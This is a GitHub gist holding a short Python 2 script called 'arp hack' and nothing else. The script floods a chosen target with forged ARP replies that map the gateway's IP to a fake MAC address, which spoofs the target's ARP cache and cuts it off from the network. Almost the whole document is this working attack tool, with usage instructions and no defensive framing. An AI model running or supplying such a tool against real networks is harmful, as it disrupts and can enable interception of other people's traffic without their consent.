Skip to content

Instantly share code, notes, and snippets.

@ls0f ls0f/arp.py
Created Feb 23, 2016

Embed
What would you like to do?
arp hack
#coding:utf-8
import socket
import time
import os
import sys
from struct import pack
ARPOP_REQUEST = pack('!H', 0x0001)
ARPOP_REPLY = pack('!H', 0x0002)
ETHERNET_PROTOCOL_TYPE_ARP = pack('!H', 0x0806)
ARP_PROTOCOL_TYPE_ETHERNET_IP = pack('!HHBB', 0x0001, 0x0800, 0x0006, 0x0004)
def get_ip_mac(ip):
cmd = "arp -n %s |tail -n 1 |awk '{print $3}' " % (ip,)
return os.popen(cmd).read().strip()
def hack(hack_ip, gate_way_ip):
sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0806))
sock.bind(("p3p1", socket.SOCK_RAW))
# sock.bind(("en0", socket.SOCK_RAW))
# 模拟网关发出arp应答
sender_ip = pack('!4B', *[int(x) for x in gate_way_ip.split('.')])
target_ip = pack('!4B', *[int(x) for x in hack_ip.split('.')])
sender_mac = pack('!6B', *(0x11,)*6)#伪造的mac地址
target_mac = pack('!6B', *(int(item, 16) for item in get_ip_mac(hack_ip).split(":")))
count = 0
arpframe = [
# ## ETHERNET
# destination MAC addr
target_mac,
# source MAC addr
sender_mac,
ETHERNET_PROTOCOL_TYPE_ARP,
# ## ARP
ARP_PROTOCOL_TYPE_ETHERNET_IP,
# operation type
ARPOP_REPLY,
# sender MAC addr
sender_mac,
# sender IP addr
sender_ip,
# target hardware addr
target_mac,
# target IP addr
target_ip,
]
# send the ARP
while 1:
sock.send(''.join(arpframe))
count += 1
sys.stdout.write("\r 发送了{}个arp包".format(count))
time.sleep(0.3)
if __name__ == '__main__':
try:
hack_ip = sys.argv[1]
gate_way_ip = sys.argv[2]
except IndexError:
print "arp.py <hack_ip> <gate_way_ip>"
sys.exit(1)
hack(hack_ip, gate_way_ip)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.